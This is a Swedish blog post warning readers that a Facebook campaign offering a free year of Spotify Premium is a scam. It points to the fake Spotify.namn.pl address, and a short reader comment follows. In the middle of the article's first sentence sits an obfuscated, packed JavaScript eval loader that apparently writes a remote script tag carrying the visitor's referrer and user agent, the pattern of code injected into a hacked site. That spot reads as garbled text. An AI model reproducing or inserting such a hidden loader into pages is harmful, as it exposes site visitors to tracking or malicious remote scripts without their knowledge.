Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Spotify Premium gratis ett år, en bluff på Facebook

Spotify Premium gratis ett år, en bluff på Facebook
Sebastian

Just eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ketkk|var|u0026u|referrer|fdfia||js|php’.split(’|’),0,{}))
nu sprids det uppgifter om att Spotify delar ut Premium-konton helt kostnadsfritt i ett år på Facebook. Det du som användare behöver göra för att ta del av erbjudandet är att dela samt gilla en sida på Facebook.

Detta är en bluff! Det påminner mycket om den kampanj om ICA som gick lös förra veckan. Så fort du gillat och kommenterat sidan skickas det ut en massa spam till dina vänner.

Vill man se om liknande meddelanden i framtiden är från rätt avsändare kan man oftast enkelt titta på vilken adress som sidan erhåller sig till. Skulle det i detta fallet vara Spotify som skickade ut meddelandet hade deras adress helt klart varit Spotify.com och inte Spotify.namn.pl.

Sammanfattat så är denna Spotify-kampanj som just nu rullar runt på Facebook scam och säkerligen ett försök på att få tag i era personuppgifter och bankkonton.

Vad ni än gör klicka inte på denna!

Comments

  1. Erik

    Man blir så trött på alla dessa spammers som hela tiden ska förstöra den säkra upplevelsen på sociala nätverk. Även på de personer som ibland är dumma och klickar på de mest konstiga länkarna också för den delen.